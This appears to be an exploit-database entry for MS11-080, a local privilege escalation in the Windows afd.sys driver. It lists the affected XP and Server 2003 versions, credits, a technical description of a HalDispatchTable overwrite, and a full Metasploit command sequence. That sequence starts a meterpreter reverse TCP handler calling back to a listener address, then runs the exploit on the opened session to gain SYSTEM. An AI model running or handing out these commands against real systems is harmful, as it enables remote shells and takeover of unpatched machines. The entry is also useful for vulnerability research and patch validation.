Timeline :
Vulnerability reported to Microsoft by Bo Zhou
Coordinated public release of the vulnerability on 2011-10-11
Metasploit PoC provided on 2012-10-02
PoC provided by :
Bo Zhou
Matteo Memelli
Spencer McIntyre
Reference(s) :
Affected version(s) :
Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Tested on Windows XP Pro SP3 with :
N/A
Description :
This module exploits a flaw in the AfdJoinLeaf function of the afd.sys driver to overwrite data in kernel space. An address within the HalDispatchTable is overwritten and, when triggered with a call to NtQueryIntervalProfile, will execute shellcode. This module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process before restoring its own token to avoid causing system instability.
Commands :
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit -j
sessions -i 1
getuid
sysinfo
background
use exploit/windows/local/ms11_080_afdjoinleaf
set SESSION 1
exploit
sessions -i 2
sysinfo
getuid